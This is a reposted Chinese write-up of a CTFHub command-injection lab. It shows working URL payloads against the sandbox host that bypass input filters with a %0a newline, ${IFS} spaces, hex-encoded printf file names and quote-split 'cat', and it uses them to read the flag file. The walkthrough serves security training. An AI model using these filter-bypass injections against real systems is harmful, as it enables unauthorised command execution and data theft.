ctfhub技能樹—RCE—綜合過濾練習 - 碼上歡樂

相關內容簡體繁體

ctfhub技能樹—RCE—綜合過濾練習

本文轉載自查看原文 2020-03-18 11:31 1843 CTF

打開靶機

查看頁面信息

查看源碼可以發現這一次過濾了很多東西，查看當前目錄信息

查詢到%0a為換行符，可以利用這個url編碼進行命令注入，開始嘗試

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#

查看flag_is_here文件夾內文件信息

challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<flag_is_here#

flag也被過濾了……

查看大佬的wp，可以使用16進制編碼繞過

開始嘗試

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65%22)#

使用同樣的方法查看文件信息

http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Aca%27%27t${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65\x2F\x66\x6C\x61\x67\x5F\x32\x31\x37\x38\x38\x33\x31\x31\x36\x38\x38\x36\x30\x31\x2E\x70\x68\x70%22)#

成功拿到flag

附上大佬文章鏈接

https://blog.csdn.net/bmth666/article/details/104836708

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CTFHub題解-技能樹-Web-RCE【過濾目錄分隔符、過濾運算符、綜合過濾練習】(二) ctfhub技能樹—RCE—過濾空格 ctfhub技能樹—RCE—過濾cat CTFHub web技能樹之RCE初步命令注入+過濾cat CTFHub web技能樹 RCE CTFHub題解-技能樹-Web-RCE【命令注入、過濾cat、過濾空格】(一) ctfhub技能樹—RCE—過濾目錄分隔符，過濾運算符 ctfhub技能樹—RCE—命令注入 ctfhub技能樹—sql注入—過濾空格 CTFHub題解-技能樹-Web-SQL注入（過濾空格）【四】

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM